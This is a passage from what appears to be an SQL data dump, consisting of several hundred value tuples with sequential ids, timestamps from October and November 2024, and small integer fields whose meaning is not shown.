(14162, '2024-10-12 06:49:51', 1, 2059, 0, 1, 1),
(14163, '2024-10-12 11:01:05', 1, 2055, 0, 1, 1),
(14164, '2024-10-12 11:33:49', 1, 2054, 0, 1, 1),
(14165, '2024-10-12 12:01:42', 1, 2062, 0, 1, 1),
(14166, '2024-10-12 12:21:08', 1, 2059, 0, 1, 1),
(14167, '2024-10-12 15:40:05', 1, 2064, 0, 1, 1),
(14168, '2024-10-12 20:36:25', 1, 2058, 0, 1, 1),
(14169, '2024-10-12 20:37:59', 1, 2059, 0, 1, 1),
(14170, '2024-10-12 21:28:18', 1, 2063, 0, 1, 1),
(14171, '2024-10-13 00:06:01', 1, 2054, 0, 1, 1),
(14172, '2024-10-13 02:16:45', 1, 2058, 0, 1, 1),
(14173, '2024-10-13 04:14:10', 1, 2064, 0, 1, 1),
(14174, '2024-10-13 05:51:29', 1, 2059, 0, 1, 1),
(14175, '2024-10-13 05:52:08', 1, 2059, 0, 1, 1),
(14176, '2024-10-13 05:52:48', 1, 2059, 0, 1, 1),
(14177, '2024-10-13 07:05:36', 1, 2058, 0, 1, 1),
(14178, '2024-10-13 09:13:26', 1, 2054, 0, 1, 1),
(14179, '2024-10-13 11:38:52', 1, 2058, 0, 1, 1),
(14180, '2024-10-13 12:00:48', 1, 2058, 0, 1, 1),
(14181, '2024-10-13 12:44:20', 1, 2064, 0, 1, 1),
(14182, '2024-10-13 13:06:52', 1, 2054, 0, 1, 1),
(14183, '2024-10-13 23:20:43', 1, 2061, 0, 1, 1),
(14184, '2024-10-13 23:20:46', 1, 2061, 0, 1, 1),
(14185, '2024-10-13 23:20:48', 1, 2061, 0, 1, 1),
(14186, '2024-10-14 01:50:46', 1, 2054, 0, 1, 1),
(14187, '2024-10-14 07:09:08', 1, 2061, 0, 1, 1),
(14188, '2024-10-14 07:09:17', 1, 2061, 0, 1, 1),
(14189, '2024-10-14 08:25:03', 1, 2064, 0, 1, 1),
(14190, '2024-10-14 08:42:27', 1, 2054, 0, 1, 1),
(14191, '2024-10-14 08:42:36', 1, 2055, 0, 1, 1),
(14192, '2024-10-14 08:42:43', 1, 2058, 0, 1, 1),
(14193, '2024-10-14 08:42:50', 1, 2059, 0, 1, 1),
(14194, '2024-10-14 08:42:56', 1, 2060, 0, 1, 1),
(14195, '2024-10-14 08:43:02', 1, 2061, 0, 1, 1),
(14196, '2024-10-14 08:43:21', 1, 2062, 0, 1, 1),
(14197, '2024-10-14 08:43:36', 1, 2063, 0, 1, 1),
(14198, '2024-10-14 08:44:05', 1, 2064, 0, 1, 1),
(14199, '2024-10-14 08:44:17', 1, 2064, 0, 1, 1),
(14200, '2024-10-14 09:28:50', 1, 2059, 0, 1, 1),
(14201, '2024-10-14 11:16:30', 1, 2062, 0, 1, 1),
(14202, '2024-10-14 12:56:36', 1, 2064, 0, 1, 1),
(14203, '2024-10-14 14:32:31', 1, 2054, 0, 1, 1),
(14204, '2024-10-14 15:11:37', 1, 2061, 0, 1, 1),
(14205, '2024-10-14 16:28:28', 1, 2058, 0, 1, 1),
(14206, '2024-10-14 16:28:59', 1, 2061, 0, 1, 1),
(14207, '2024-10-14 16:29:09', 1, 2059, 0, 1, 1),
(14208, '2024-10-14 16:29:18', 1, 2060, 0, 1, 1),
(14209, '2024-10-14 16:29:23', 1, 2062, 0, 1, 1),
(14210, '2024-10-14 16:29:27', 1, 2063, 0, 1, 1),
(14211, '2024-10-14 16:29:32', 1, 2064, 0, 1, 1),
(14212, '2024-10-14 16:30:13', 1, 2055, 0, 1, 1),
(14213, '2024-10-14 16:30:20', 1, 2054, 0, 1, 1),
(14214, '2024-10-14 16:30:28', 1, 2053, 0, 1, 1),
(14215, '2024-10-14 17:36:25', 1, 2058, 0, 1, 1),
(14216, '2024-10-14 17:36:38', 1, 2061, 0, 1, 1),
(14217, '2024-10-14 17:36:52', 1, 2059, 0, 1, 1),
(14218, '2024-10-14 17:37:07', 1, 2060, 0, 1, 1),
(14219, '2024-10-14 17:37:21', 1, 2062, 0, 1, 1),
(14220, '2024-10-14 17:37:36', 1, 2063, 0, 1, 1),
(14221, '2024-10-14 17:37:51', 1, 2064, 0, 1, 1),
(14222, '2024-10-14 17:39:25', 1, 2055, 0, 1, 1),
(14223, '2024-10-14 17:39:30', 1, 2054, 0, 1, 1),
(14224, '2024-10-14 17:39:35', 1, 2053, 0, 1, 1),
(14225, '2024-10-15 00:06:56', 1, 2054, 0, 1, 1),
(14226, '2024-10-15 02:43:01', 1, 2054, 0, 1, 1),
(14227, '2024-10-15 03:06:09', 1, 2062, 0, 1, 1),
(14228, '2024-10-15 12:43:04', 1, 2060, 0, 1, 1),
(14229, '2024-10-15 14:32:21', 1, 2058, 0, 1, 1),
(14230, '2024-10-15 15:51:29', 1, 2054, 0, 1, 1),
(14231, '2024-10-15 18:20:09', 1, 2064, 0, 1, 1),
(14232, '2024-10-15 19:02:31', 1, 2055, 0, 1, 1),
(14233, '2024-10-16 06:51:59', 1, 2054, 0, 1, 1),
(14234, '2024-10-16 11:53:58', 1, 2060, 0, 1, 1),
(14235, '2024-10-16 12:41:16', 1, 2060, 0, 1, 1),
(14236, '2024-10-16 18:39:28', 1, 2054, 0, 1, 1),
(14237, '2024-10-16 18:39:32', 1, 2055, 0, 1, 1),
(14238, '2024-10-16 18:39:37', 1, 2058, 0, 1, 1),
(14239, '2024-10-16 18:39:41', 1, 2059, 0, 1, 1),
(14240, '2024-10-16 18:39:46', 1, 2060, 0, 1, 1),
(14241, '2024-10-16 18:39:50', 1, 2061, 0, 1, 1),
(14242, '2024-10-16 18:39:53', 1, 2062, 0, 1, 1),
(14243, '2024-10-16 18:39:56', 1, 2063, 0, 1, 1),
(14244, '2024-10-16 18:40:09', 1, 2064, 0, 1, 1),
(14245, '2024-10-16 18:40:16', 1, 2064, 0, 1, 1),
(14246, '2024-10-16 18:40:23', 1, 2064, 0, 1, 1),
(14247, '2024-10-16 20:03:57', 1, 2054, 0, 1, 1),
(14248, '2024-10-16 22:51:32', 1, 2062, 0, 1, 1),
(14249, '2024-10-17 02:18:42', 1, 2054, 0, 1, 1),
(14250, '2024-10-17 06:27:53', 1, 2058, 0, 1, 1),
(14251, '2024-10-17 06:27:58', 1, 2059, 0, 1, 1),
(14252, '2024-10-17 10:38:59', 1, 2054, 0, 1, 1),
(14253, '2024-10-17 12:39:14', 1, 2054, 0, 1, 1),
(14254, '2024-10-17 12:50:21', 1, 2062, 0, 1, 1),
(14255, '2024-10-17 13:30:12', 1, 2064, 0, 1, 1),
(14256, '2024-10-17 15:54:03', 1, 2055, 0, 1, 1),
(14257, '2024-10-17 18:40:00', 1, 2064, 0, 1, 1),
(14258, '2024-10-17 18:51:40', 1, 2058, 0, 1, 1),
(14259, '2024-10-17 22:14:13', 1, 2064, 0, 1, 1),
(14260, '2024-10-17 23:24:14', 1, 2058, 0, 1, 1),
(14261, '2024-10-17 23:54:12', 1, 2054, 0, 1, 1),
(14262, '2024-10-18 01:39:18', 1, 2064, 0, 1, 1),
(14263, '2024-10-18 10:49:50', 1, 2059, 0, 1, 1),
(14264, '2024-10-18 11:32:12', 1, 2062, 0, 1, 1),
(14265, '2024-10-18 11:32:14', 1, 2063, 0, 1, 1),
(14266, '2024-10-18 12:31:39', 1, 2062, 0, 1, 1),
(14267, '2024-10-18 12:50:56', 1, 2054, 0, 1, 1),
(14268, '2024-10-18 13:25:01', 1, 2063, 0, 1, 1),
(14269, '2024-10-18 14:59:16', 1, 2061, 0, 1, 1),
(14270, '2024-10-18 15:20:25', 1, 2061, 0, 1, 1),
(14271, '2024-10-18 23:05:03', 1, 2053, 0, 1, 1),
(14272, '2024-10-19 02:00:21', 1, 2054, 0, 1, 1),
(14273, '2024-10-19 05:40:16', 1, 2058, 0, 1, 1),
(14274, '2024-10-19 06:59:39', 1, 2060, 0, 1, 1),
(14275, '2024-10-19 07:09:40', 1, 2063, 0, 1, 1),
(14276, '2024-10-19 07:38:57', 1, 2058, 0, 1, 1),
(14277, '2024-10-19 07:47:30', 1, 2062, 0, 1, 1),
(14278, '2024-10-19 08:39:09', 1, 2055, 0, 1, 1),
(14279, '2024-10-19 10:14:43', 1, 2061, 0, 1, 1),
(14280, '2024-10-19 11:02:33', 1, 2062, 0, 1, 1),
(14281, '2024-10-19 11:25:28', 1, 2063, 0, 1, 1),
(14282, '2024-10-19 12:29:09', 1, 2054, 0, 1, 1),
(14283, '2024-10-19 12:47:14', 1, 2059, 0, 1, 1),
(14284, '2024-10-19 13:03:26', 1, 2064, 0, 1, 1),
(14285, '2024-10-19 13:20:28', 1, 2054, 0, 1, 1),
(14286, '2024-10-19 14:18:53', 1, 2062, 0, 1, 1),
(14287, '2024-10-19 18:35:37', 1, 2063, 0, 1, 1),
(14288, '2024-10-19 21:51:51', 1, 2063, 0, 1, 1),
(14289, '2024-10-19 22:01:13', 1, 2062, 0, 1, 1),
(14290, '2024-10-19 22:44:43', 1, 2063, 0, 1, 1),
(14291, '2024-10-19 23:01:52', 1, 2060, 0, 1, 1),
(14292, '2024-10-19 23:10:27', 1, 2063, 0, 1, 1),
(14293, '2024-10-19 23:20:21', 1, 2060, 0, 1, 1),
(14294, '2024-10-19 23:37:03', 1, 2058, 0, 1, 1),
(14295, '2024-10-20 00:25:56', 1, 2054, 0, 1, 1),
(14296, '2024-10-20 00:34:42', 1, 2055, 0, 1, 1),
(14297, '2024-10-20 01:17:04', 1, 2060, 0, 1, 1),
(14298, '2024-10-20 01:25:57', 1, 2063, 0, 1, 1),
(14299, '2024-10-20 01:54:12', 1, 2058, 0, 1, 1),
(14300, '2024-10-20 02:51:33', 1, 2055, 0, 1, 1),
(14301, '2024-10-20 04:56:49', 1, 2060, 0, 1, 1),
(14302, '2024-10-20 05:12:46', 1, 2063, 0, 1, 1),
(14303, '2024-10-20 06:00:30', 1, 2058, 0, 1, 1),
(14304, '2024-10-20 06:34:03', 1, 2053, 0, 1, 1),
(14305, '2024-10-20 07:34:02', 1, 2055, 0, 1, 1),
(14306, '2024-10-20 10:09:33', 1, 2061, 0, 1, 1),
(14307, '2024-10-20 10:28:59', 1, 2060, 0, 1, 1),
(14308, '2024-10-20 11:26:02', 1, 2054, 0, 1, 1),
(14309, '2024-10-20 11:28:46', 1, 2062, 0, 1, 1),
(14310, '2024-10-20 13:51:22', 1, 2054, 0, 1, 1),
(14311, '2024-10-20 14:21:28', 1, 2059, 0, 1, 1),
(14312, '2024-10-20 14:46:10', 1, 2064, 0, 1, 1),
(14313, '2024-10-20 15:12:05', 1, 2060, 0, 1, 1),
(14314, '2024-10-20 16:28:28', 1, 2064, 0, 1, 1),
(14315, '2024-10-20 16:28:31', 1, 2058, 0, 1, 1),
(14316, '2024-10-20 17:31:23', 1, 2061, 0, 1, 1),
(14317, '2024-10-20 17:36:23', 1, 2054, 0, 1, 1),
(14318, '2024-10-20 17:53:33', 1, 2053, 0, 1, 1),
(14319, '2024-10-20 21:26:25', 1, 2064, 0, 1, 1),
(14320, '2024-10-20 23:51:17', 1, 2058, 0, 1, 1),
(14321, '2024-10-21 01:01:39', 1, 2062, 0, 1, 1),
(14322, '2024-10-21 05:41:14', 1, 2062, 0, 1, 1),
(14323, '2024-10-21 06:35:16', 1, 2059, 0, 1, 1),
(14324, '2024-10-21 07:09:14', 1, 2054, 0, 1, 1),
(14325, '2024-10-21 09:43:18', 1, 2054, 0, 1, 1),
(14326, '2024-10-21 12:04:21', 1, 2064, 0, 1, 1),
(14327, '2024-10-21 13:05:23', 1, 2054, 0, 1, 1),
(14328, '2024-10-21 18:55:01', 1, 2054, 0, 1, 1),
(14329, '2024-10-21 23:09:27', 1, 2054, 0, 1, 1),
(14330, '2024-10-22 02:59:04', 1, 2054, 0, 1, 1),
(14331, '2024-10-22 11:00:38', 1, 2059, 0, 1, 1),
(14332, '2024-10-22 12:12:56', 1, 2054, 0, 1, 1),
(14333, '2024-10-22 14:16:23', 1, 2062, 0, 1, 1),
(14334, '2024-10-22 17:22:20', 1, 2059, 0, 1, 1),
(14335, '2024-10-22 17:22:25', 1, 2059, 0, 1, 1),
(14336, '2024-10-22 17:22:35', 1, 2059, 0, 1, 1),
(14337, '2024-10-22 17:22:53', 1, 2059, 0, 1, 1),
(14338, '2024-10-22 17:50:08', 1, 2060, 0, 1, 1),
(14339, '2024-10-22 22:41:51', 1, 2059, 0, 1, 1),
(14340, '2024-10-22 23:37:10', 1, 2054, 0, 1, 1),
(14341, '2024-10-23 00:08:29', 1, 2054, 0, 1, 1),
(14342, '2024-10-23 03:20:27', 1, 2064, 0, 1, 1),
(14343, '2024-10-23 04:05:28', 1, 2058, 0, 1, 1),
(14344, '2024-10-23 10:49:31', 1, 2054, 0, 1, 1),
(14345, '2024-10-23 10:49:58', 1, 2060, 0, 1, 1),
(14346, '2024-10-23 11:45:57', 1, 2060, 0, 1, 1),
(14347, '2024-10-23 14:00:18', 1, 2059, 0, 1, 1),
(14348, '2024-10-23 16:57:28', 1, 2062, 0, 1, 1),
(14349, '2024-10-23 19:06:27', 1, 2058, 0, 1, 1),
(14350, '2024-10-24 00:21:55', 1, 2054, 0, 1, 1),
(14351, '2024-10-24 07:25:30', 1, 2063, 0, 1, 1),
(14352, '2024-10-24 07:59:16', 1, 2053, 0, 1, 1),
(14353, '2024-10-24 12:04:17', 1, 2064, 0, 1, 1),
(14354, '2024-10-24 12:45:14', 1, 2054, 0, 1, 1),
(14355, '2024-10-24 23:48:19', 1, 2054, 0, 1, 1),
(14356, '2024-10-25 03:24:51', 1, 2061, 0, 1, 1),
(14357, '2024-10-25 04:55:32', 1, 2064, 0, 1, 1),
(14358, '2024-10-25 06:04:50', 1, 2058, 0, 1, 1),
(14359, '2024-10-25 09:38:54', 1, 2064, 0, 1, 1),
(14360, '2024-10-25 09:47:59', 1, 2059, 0, 1, 1),
(14361, '2024-10-25 12:28:15', 1, 2054, 0, 1, 1),
(14362, '2024-10-25 14:15:19', 1, 2063, 0, 1, 1),
(14363, '2024-10-25 19:20:17', 1, 2062, 0, 1, 1),
(14364, '2024-10-25 19:21:15', 1, 2058, 0, 1, 1),
(14365, '2024-10-25 19:23:25', 1, 2064, 0, 1, 1),
(14366, '2024-10-25 21:26:26', 1, 2063, 0, 1, 1),
(14367, '2024-10-26 00:17:09', 1, 2054, 0, 1, 1),
(14368, '2024-10-26 00:23:01', 1, 2055, 0, 1, 1),
(14369, '2024-10-26 08:14:45', 1, 2060, 0, 1, 1),
(14370, '2024-10-26 09:56:30', 1, 2055, 0, 1, 1),
(14371, '2024-10-26 12:45:47', 1, 2060, 0, 1, 1),
(14372, '2024-10-26 14:22:41', 1, 2054, 0, 1, 1),
(14373, '2024-10-26 15:24:33', 1, 2062, 0, 1, 1),
(14374, '2024-10-26 18:28:58', 1, 2063, 0, 1, 1),
(14375, '2024-10-26 20:52:39', 1, 2054, 0, 1, 1),
(14376, '2024-10-27 00:17:08', 1, 2063, 0, 1, 1),
(14377, '2024-10-27 00:19:17', 1, 2054, 0, 1, 1),
(14378, '2024-10-27 01:13:31', 1, 2054, 0, 1, 1),
(14379, '2024-10-27 03:41:36', 1, 2055, 0, 1, 1),
(14380, '2024-10-27 03:41:39', 1, 2064, 0, 1, 1),
(14381, '2024-10-27 03:41:43', 1, 2063, 0, 1, 1),
(14382, '2024-10-27 03:41:47', 1, 2062, 0, 1, 1),
(14383, '2024-10-27 03:41:50', 1, 2060, 0, 1, 1),
(14384, '2024-10-27 07:42:08', 1, 2062, 0, 1, 1),
(14385, '2024-10-27 08:43:47', 1, 2064, 0, 1, 1),
(14386, '2024-10-27 08:53:01', 1, 2061, 0, 1, 1),
(14387, '2024-10-27 10:46:38', 1, 2054, 0, 1, 1),
(14388, '2024-10-27 10:52:03', 1, 2054, 0, 1, 1),
(14389, '2024-10-27 16:15:20', 1, 2063, 0, 1, 1),
(14390, '2024-10-27 16:17:43', 1, 2063, 0, 1, 1),
(14391, '2024-10-27 18:34:10', 1, 2064, 0, 1, 1),
(14392, '2024-10-27 18:54:57', 1, 2062, 0, 1, 1),
(14393, '2024-10-27 19:01:52', 1, 2060, 0, 1, 1),
(14394, '2024-10-27 22:48:33', 1, 2054, 0, 1, 1),
(14395, '2024-10-28 03:33:40', 1, 2062, 0, 1, 1),
(14396, '2024-10-28 03:35:42', 1, 2059, 0, 1, 1),
(14397, '2024-10-28 06:35:11', 1, 2058, 0, 1, 1),
(14398, '2024-10-28 06:43:09', 1, 2064, 0, 1, 1),
(14399, '2024-10-28 06:44:16', 1, 2062, 0, 1, 1),
(14400, '2024-10-28 07:58:27', 1, 2058, 0, 1, 1),
(14401, '2024-10-28 10:22:59', 1, 2054, 0, 1, 1),
(14402, '2024-10-28 11:33:50', 1, 2064, 0, 1, 1),
(14403, '2024-10-28 11:38:26', 1, 2058, 0, 1, 1),
(14404, '2024-10-28 13:28:54', 1, 2059, 0, 1, 1),
(14405, '2024-10-28 19:14:05', 1, 2055, 0, 1, 1),
(14406, '2024-10-28 22:47:19', 1, 2062, 0, 1, 1),
(14407, '2024-10-28 23:10:14', 1, 2064, 0, 1, 1),
(14408, '2024-10-28 23:45:13', 1, 2054, 0, 1, 1),
(14409, '2024-10-29 02:29:53', 1, 2055, 0, 1, 1),
(14410, '2024-10-29 04:24:58', 1, 2064, 0, 1, 1),
(14411, '2024-10-29 08:22:07', 1, 2063, 0, 1, 1),
(14412, '2024-10-29 12:02:55', 1, 2054, 0, 1, 1),
(14413, '2024-10-29 13:42:20', 1, 2060, 0, 1, 1),
(14414, '2024-10-29 23:53:03', 1, 2054, 0, 1, 1),
(14415, '2024-10-30 01:14:40', 1, 2062, 0, 1, 1),
(14416, '2024-10-30 03:21:48', 1, 2059, 0, 1, 1),
(14417, '2024-10-30 03:21:50', 1, 2059, 0, 1, 1),
(14418, '2024-10-30 12:37:57', 1, 2054, 0, 1, 1),
(14419, '2024-10-30 12:55:47', 1, 2064, 0, 1, 1),
(14420, '2024-10-30 12:56:12', 1, 2058, 0, 1, 1),
(14421, '2024-10-30 12:56:21', 1, 2062, 0, 1, 1),
(14422, '2024-10-30 13:15:39', 1, 2064, 0, 1, 1),
(14423, '2024-10-30 13:15:44', 1, 2064, 0, 1, 1),
(14424, '2024-10-30 13:15:49', 1, 2064, 0, 1, 1),
(14425, '2024-10-30 18:42:54', 1, 2059, 0, 1, 1),
(14426, '2024-10-30 19:37:02', 1, 2064, 0, 1, 1),
(14427, '2024-10-31 03:05:26', 1, 2054, 0, 1, 1),
(14428, '2024-10-31 09:16:19', 1, 2064, 0, 1, 1),
(14429, '2024-10-31 11:40:42', 1, 2054, 0, 1, 1),
(14430, '2024-10-31 12:25:13', 1, 2054, 0, 1, 1),
(14431, '2024-10-31 16:03:52', 1, 2061, 0, 1, 1),
(14432, '2024-10-31 23:21:12', 1, 2059, 0, 1, 1),
(14433, '2024-10-31 23:33:40', 1, 2060, 0, 1, 1),
(14434, '2024-11-01 01:47:48', 1, 2058, 0, 1, 1),
(14435, '2024-11-01 02:55:43', 1, 2053, 0, 1, 1),
(14436, '2024-11-01 05:51:42', 1, 2061, 0, 1, 1),
(14437, '2024-11-01 10:43:44', 1, 2054, 0, 1, 1),
(14438, '2024-11-01 11:29:37', 1, 2060, 0, 1, 1),
(14439, '2024-11-01 12:22:11', 1, 2059, 0, 1, 1),
(14440, '2024-11-01 12:55:09', 1, 2064, 0, 1, 1),
(14441, '2024-11-01 13:23:46', 1, 2061, 0, 1, 1),
(14442, '2024-11-01 14:54:24', 1, 2054, 0, 1, 1),
(14443, '2024-11-01 16:03:53', 1, 2058, 0, 1, 1),
(14444, '2024-11-01 18:37:10', 1, 2060, 0, 1, 1),
(14445, '2024-11-01 20:03:53', 1, 2064, 0, 1, 1),
(14446, '2024-11-01 23:14:35', 1, 2064, 0, 1, 1),
(14447, '2024-11-02 02:00:11', 1, 2062, 0, 1, 1),
(14448, '2024-11-02 02:11:00', 1, 2058, 0, 1, 1),
(14449, '2024-11-02 03:01:26', 1, 2053, 0, 1, 1),
(14450, '2024-11-02 06:31:44', 1, 2054, 0, 1, 1),
(14451, '2024-11-02 06:57:18', 1, 2063, 0, 1, 1),
(14452, '2024-11-02 06:57:22', 1, 2063, 0, 1, 1),
(14453, '2024-11-02 09:24:30', 1, 2061, 0, 1, 1),
(14454, '2024-11-02 10:16:50', 1, 2061, 0, 1, 1),
(14455, '2024-11-02 17:27:10', 1, 2061, 0, 1, 1),
(14456, '2024-11-02 17:27:10', 1, 2055, 0, 1, 1),
(14457, '2024-11-02 17:27:10', 1, 2059, 0, 1, 1),
(14458, '2024-11-02 17:27:10', 1, 2058, 0, 1, 1),
(14459, '2024-11-02 17:27:10', 1, 2063, 0, 1, 1),
(14460, '2024-11-02 17:27:10', 1, 2060, 0, 1, 1),
(14461, '2024-11-02 17:27:10', 1, 2064, 0, 1, 1),
(14462, '2024-11-02 17:27:10', 1, 2062, 0, 1, 1),
(14463, '2024-11-02 20:16:10', 1, 2055, 0, 1, 1),
(14464, '2024-11-03 00:44:42', 1, 2054, 0, 1, 1),
(14465, '2024-11-03 04:23:38', 1, 2054, 0, 1, 1),
(14466, '2024-11-03 05:14:53', 1, 2064, 0, 1, 1),
(14467, '2024-11-03 10:49:22', 1, 2054, 0, 1, 1),
(14468, '2024-11-04 05:13:12', 1, 2061, 0, 1, 1),
(14469, '2024-11-04 09:31:51', 1, 2060, 0, 1, 1),
(14470, '2024-11-04 11:25:32', 1, 2059, 0, 1, 1),
(14471, '2024-11-04 12:08:48', 1, 2059, 0, 1, 1),
(14472, '2024-11-04 13:34:43', 1, 2064, 0, 1, 1),
(14473, '2024-11-04 13:40:09', 1, 2064, 0, 1, 1),
(14474, '2024-11-04 13:40:11', 1, 2062, 0, 1, 1),
(14475, '2024-11-04 13:40:59', 1, 2058, 0, 1, 1),
(14476, '2024-11-04 13:43:04', 1, 2060, 0, 1, 1),
(14477, '2024-11-04 13:50:06', 1, 2060, 0, 1, 1),
(14478, '2024-11-04 14:14:46', 1, 2060, 0, 1, 1),
(14479, '2024-11-04 14:23:54', 1, 2063, 0, 1, 1),
(14480, '2024-11-04 14:52:31', 1, 2058, 0, 1, 1),
(14481, '2024-11-04 15:50:56', 1, 2055, 0, 1, 1),
(14482, '2024-11-04 17:47:07', 1, 2060, 0, 1, 1),
(14483, '2024-11-04 17:55:38', 1, 2063, 0, 1, 1),
(14484, '2024-11-04 18:39:43', 1, 2060, 0, 1, 1),
(14485, '2024-11-04 18:48:07', 1, 2063, 0, 1, 1),
(14486, '2024-11-04 19:15:11', 1, 2058, 0, 1, 1),
(14487, '2024-11-04 20:11:42', 1, 2055, 0, 1, 1),
(14488, '2024-11-04 21:43:51', 1, 2061, 0, 1, 1),
(14489, '2024-11-04 22:42:08', 1, 2060, 0, 1, 1),
(14490, '2024-11-04 22:50:54', 1, 2063, 0, 1, 1),
(14491, '2024-11-04 23:19:28', 1, 2058, 0, 1, 1),
(14492, '2024-11-05 00:17:38', 1, 2055, 0, 1, 1),
(14493, '2024-11-05 01:49:14', 1, 2061, 0, 1, 1),
(14494, '2024-11-05 02:25:58', 1, 2063, 0, 1, 1),
(14495, '2024-11-05 02:27:26', 1, 2062, 0, 1, 1),
(14496, '2024-11-05 03:36:13', 1, 2054, 0, 1, 1),
(14497, '2024-11-05 03:50:08', 1, 2059, 0, 1, 1),
(14498, '2024-11-05 04:01:00', 1, 2064, 0, 1, 1),
(14499, '2024-11-05 04:28:03', 1, 2060, 0, 1, 1),
(14500, '2024-11-05 04:36:15', 1, 2063, 0, 1, 1),
(14501, '2024-11-05 05:01:12', 1, 2058, 0, 1, 1),
(14502, '2024-11-05 05:59:25', 1, 2054, 0, 1, 1),
(14503, '2024-11-05 07:06:58', 1, 2060, 0, 1, 1),
(14504, '2024-11-05 07:15:39', 1, 2063, 0, 1, 1),
(14505, '2024-11-05 07:44:25', 1, 2058, 0, 1, 1),
(14506, '2024-11-05 08:45:33', 1, 2055, 0, 1, 1),
(14507, '2024-11-05 09:45:05', 1, 2054, 0, 1, 1),
(14508, '2024-11-05 10:24:01', 1, 2061, 0, 1, 1),
(14509, '2024-11-05 11:03:15', 1, 2062, 0, 1, 1),
(14510, '2024-11-05 12:11:42', 1, 2054, 0, 1, 1),
(14511, '2024-11-05 12:25:32', 1, 2059, 0, 1, 1),
(14512, '2024-11-05 12:36:06', 1, 2064, 0, 1, 1),
(14513, '2024-11-05 13:10:14', 1, 2055, 0, 1, 1),
(14514, '2024-11-05 14:52:44', 1, 2062, 0, 1, 1),
(14515, '2024-11-05 15:29:54', 1, 2060, 0, 1, 1),
(14516, '2024-11-05 15:39:05', 1, 2063, 0, 1, 1),
(14517, '2024-11-05 16:04:54', 1, 2064, 0, 1, 1),
(14518, '2024-11-05 16:05:07', 1, 2064, 0, 1, 1),
(14519, '2024-11-05 16:05:07', 1, 2064, 0, 1, 1),
(14520, '2024-11-05 16:07:49', 1, 2058, 0, 1, 1),
(14521, '2024-11-05 17:45:38', 1, 2060, 0, 1, 1),
(14522, '2024-11-05 18:04:19', 1, 2063, 0, 1, 1),
(14523, '2024-11-05 18:29:05', 1, 2059, 0, 1, 1),
(14524, '2024-11-05 18:50:27', 1, 2059, 0, 1, 1),
(14525, '2024-11-05 19:00:55', 1, 2058, 0, 1, 1),
(14526, '2024-11-05 19:47:13', 1, 2054, 0, 1, 1),
(14527, '2024-11-05 20:53:41', 1, 2055, 0, 1, 1),
(14528, '2024-11-05 23:59:28', 1, 2061, 0, 1, 1),
(14529, '2024-11-06 00:50:01', 1, 2060, 0, 1, 1),
(14530, '2024-11-06 01:00:40', 1, 2063, 0, 1, 1),
(14531, '2024-11-06 01:21:06', 1, 2064, 0, 1, 1),
(14532, '2024-11-06 01:34:55', 1, 2058, 0, 1, 1),
(14533, '2024-11-06 01:35:01', 1, 2058, 0, 1, 1),
(14534, '2024-11-06 02:45:14', 1, 2055, 0, 1, 1),
(14535, '2024-11-06 04:38:05', 1, 2061, 0, 1, 1),
(14536, '2024-11-06 05:25:57', 1, 2062, 0, 1, 1),
(14537, '2024-11-06 06:22:17', 1, 2063, 0, 1, 1),
(14538, '2024-11-06 06:50:23', 1, 2054, 0, 1, 1),
(14539, '2024-11-06 07:07:29', 1, 2059, 0, 1, 1),
(14540, '2024-11-06 07:21:07', 1, 2064, 0, 1, 1),
(14541, '2024-11-06 11:11:25', 1, 2054, 0, 1, 1),
(14542, '2024-11-06 14:42:19', 1, 2054, 0, 1, 1),
(14543, '2024-11-06 15:36:42', 1, 2060, 0, 1, 1),
(14544, '2024-11-06 15:46:57', 1, 2063, 0, 1, 1),
(14545, '2024-11-06 16:17:26', 1, 2058, 0, 1, 1),
(14546, '2024-11-06 17:18:32', 1, 2055, 0, 1, 1),
(14547, '2024-11-06 18:26:05', 1, 2062, 0, 1, 1),
(14548, '2024-11-06 18:28:16', 1, 2054, 0, 1, 1),
(14549, '2024-11-06 18:28:18', 1, 2055, 0, 1, 1),
(14550, '2024-11-06 18:28:26', 1, 2064, 0, 1, 1),
(14551, '2024-11-06 18:28:29', 1, 2063, 0, 1, 1),
(14552, '2024-11-06 18:28:30', 1, 2062, 0, 1, 1),
(14553, '2024-11-06 18:28:32', 1, 2060, 0, 1, 1),
(14554, '2024-11-06 18:28:34', 1, 2059, 0, 1, 1),
(14555, '2024-11-06 18:28:45', 1, 2061, 0, 1, 1),
(14556, '2024-11-06 18:28:51', 1, 2058, 0, 1, 1),
(14557, '2024-11-06 19:00:12', 1, 2061, 0, 1, 1),
(14558, '2024-11-06 19:40:03', 1, 2060, 0, 1, 1),
(14559, '2024-11-06 19:52:26', 1, 2063, 0, 1, 1),
(14560, '2024-11-06 20:26:06', 1, 2064, 0, 1, 1),
(14561, '2024-11-06 20:27:18', 1, 2062, 0, 1, 1),
(14562, '2024-11-06 20:30:53', 1, 2058, 0, 1, 1),
(14563, '2024-11-06 20:51:24', 1, 2058, 0, 1, 1),
(14564, '2024-11-06 21:46:55', 1, 2055, 0, 1, 1),
(14565, '2024-11-06 23:43:55', 1, 2061, 0, 1, 1),
(14566, '2024-11-07 00:33:30', 1, 2062, 0, 1, 1),
(14567, '2024-11-07 01:13:57', 1, 2060, 0, 1, 1),
(14568, '2024-11-07 01:21:40', 1, 2063, 0, 1, 1),
(14569, '2024-11-07 01:48:18', 1, 2058, 0, 1, 1),
(14570, '2024-11-07 02:40:54', 1, 2064, 0, 1, 1),
(14571, '2024-11-07 02:42:20', 1, 2055, 0, 1, 1),
(14572, '2024-11-07 03:43:46', 1, 2058, 0, 1, 1),
(14573, '2024-11-07 04:10:29', 1, 2061, 0, 1, 1),
(14574, '2024-11-07 04:39:33', 1, 2054, 0, 1, 1),
(14575, '2024-11-07 04:43:53', 1, 2062, 0, 1, 1),
(14576, '2024-11-07 05:45:26', 1, 2054, 0, 1, 1),
(14577, '2024-11-07 05:58:03', 1, 2059, 0, 1, 1),
(14578, '2024-11-07 06:08:07', 1, 2064, 0, 1, 1),
(14579, '2024-11-07 07:23:34', 1, 2060, 0, 1, 1),
(14580, '2024-11-07 07:32:32', 1, 2063, 0, 1, 1),
(14581, '2024-11-07 08:00:33', 1, 2058, 0, 1, 1),
(14582, '2024-11-07 08:58:50', 1, 2055, 0, 1, 1),
(14583, '2024-11-07 10:35:49', 1, 2061, 0, 1, 1),
(14584, '2024-11-07 11:15:11', 1, 2062, 0, 1, 1),
(14585, '2024-11-07 12:25:03', 1, 2054, 0, 1, 1),
(14586, '2024-11-07 12:39:08', 1, 2059, 0, 1, 1),
(14587, '2024-11-07 12:50:07', 1, 2064, 0, 1, 1),
(14588, '2024-11-07 13:02:34', 1, 2055, 0, 1, 1),
(14589, '2024-11-07 19:09:14', 1, 2060, 0, 1, 1),
